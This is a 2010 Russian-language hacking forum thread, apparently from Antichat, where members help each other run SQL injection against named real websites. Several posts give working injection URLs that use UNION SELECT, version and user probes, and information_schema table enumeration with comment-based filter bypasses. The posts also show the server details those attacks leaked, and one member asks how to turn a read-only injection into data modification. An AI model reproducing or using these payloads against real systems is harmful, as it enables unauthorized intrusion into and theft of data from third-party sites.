04.01.2010, 18:59
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от Strilo4ka
если
кто хочет может поиграться банк рефератов!!!
класический вариант юнион + селект не проходит и с дупликатами тоже
Код:
http://www.bank-referatov.info/info.php?id=106+and+1=1+and+substring(version(),1,1)=5
@@basedir: /
@@tmpdir: /tmp/
database(): kupich_kur
@@datadir: /var/lib/mysql/
version(): 5.0.87-community
user(): kupich_Kupich@localhost
|
|
|
04.01.2010, 18:14
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940
Репутация:
1
|
|
я в html файле пишу <script>...</script>, а <html><head><title><bodyl><head><title><body> Писать?> Писать?
|
|
|
|
04.01.2010, 19:27
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379
Репутация:
1069
|
|
я с подобным раньше не сталкивался:
http://web.atto.ru/catalog_new/catal...ar&CODE=211259
если подставить кавычку, то эрроры будут и от mssql и от mysql, как это ?
и возможно ли из этого что-то извлечь полезное (имя БД, юзера, версию, а то как ни пробовал, не получается) ? |
|
|
|
04.01.2010, 20:27
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379
Репутация:
1069
|
|
Сообщение от Strilo4ka
пути
а mssql и mysql одновременно, это как ? 
|
|
|
|
04.01.2010, 20:31
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
А что здесь странного? Разве то, что об этом нигде не писалось, но все возможно. Все зависит от скрипта, в котором могут быть и все СУБД одновременно.
|
|
|
|
04.01.2010, 20:39
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379
Репутация:
1069
|
|
А что здесь странного? Разве то, что об этом нигде не писалось, но все возможно. Все зависит от скрипта, в котором могут быть и все СУБД одновременно.
скрипт с 2 СУБД поидеи работает и все, ничего тут странного .
только что нашел на atto домене
http://smarthome.atto.ru/index.php?page=news&act=view&id=378+union+select+1 ,2,concat_ws(0x3a,user(),data base(),version(),@@version_compile_os),4,5--+
atto@localhost:atto_new:4.1.22-log  ortbld-freebsd6.2 Спасибо =)
|
|
|
|
04.01.2010, 20:56
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Уважаемые форучане, нужна ваша помощь в данной иньекции..по мне так стоит фильтр на лимит и на скобки.... подсобите пожайлуста..
http://topline.md/products.php?idproduct=-8819/**/UNION/**/SELECT/**/1,2,3,table_name,5,6,7,8,9/**/from/**/information_schema.tables/**/%23&idcat=1
|
|
|
|
04.01.2010, 21:00
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
http://topline.md/products.php?idproduct=-8819/**/UNION/**/SELECT/**/1,2,3,table_name,5,6,7,8,9/**/from/**/information_schema.tables/**/limit/**/1,1/**/%23&idcat=1
не понял трабла (хотя со скобками да, заморочка какая-то)
PS: СНГ )
Последний раз редактировалось Pashkela; 04.01.2010 в 21:03..
|
|
|
|
04.01.2010, 21:02
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Pashkela извини.. что то я тормознул...большое спасибо
|
|
|
|
04.01.2010, 23:00
|
|
Новичок
Регистрация: 27.02.2007
Сообщений: 8
Провел на форуме:
29882
Репутация:
0
|
|
А можно ли вставить подзапрос модификации в инъекцию select?
Привелегий на запись файлов нет, привелегий на чтение файлов нет...
Хотелось бы выполнить insert или update..
База MySQL, 5.0.70
Последний раз редактировалось ZavuloN; 04.01.2010 в 23:06..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
